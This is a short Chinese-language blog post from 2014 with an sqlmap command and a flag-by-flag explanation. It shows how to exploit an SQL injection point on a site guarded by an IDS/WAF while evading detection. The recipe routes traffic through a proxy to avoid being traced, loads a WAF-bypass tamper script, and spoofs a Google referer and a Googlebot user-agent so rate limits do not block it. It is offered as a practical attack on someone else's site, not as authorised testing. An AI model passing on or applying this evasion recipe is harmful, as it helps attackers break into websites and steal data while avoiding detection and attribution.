sqlmap注入技巧-绕过WAF和IDS

时间:2014-04-18 18:33:00 +0800

刚刚群里有个哥们发了个注入点,有IDS防火墙,请求过于频繁就会封杀IP

有个思路,抛砖引玉,各位大牛请轻拍

sqlmap.py --proxy http://127.0.0.1:8087 -u 你懂得 -v 3 –dbms “MySQL” --tamper “space2morehash.py” --referer“http://www.google.com”  --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

参数解释 :

--proxy //这个是代理的IP,你不用代理不用VPN就不怕被查水表么。。。

-u  //这个不懂的面壁去

-v 3 //这个是注入的详细级别1-5

--dbms "MySQL"  //指定数据库

--tamper “space2morehash.py”  //载入绕过WAF防火墙的脚本

--referer“http://www.google.com”  //模拟来源,就是从哪个网页跳转过来的。如果不懂可以谷歌referer

--user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"   模拟谷歌蜘蛛,一般都不会限制蜘蛛爬网站。

×

Subscribe

The latest tutorials sent straight to your inbox.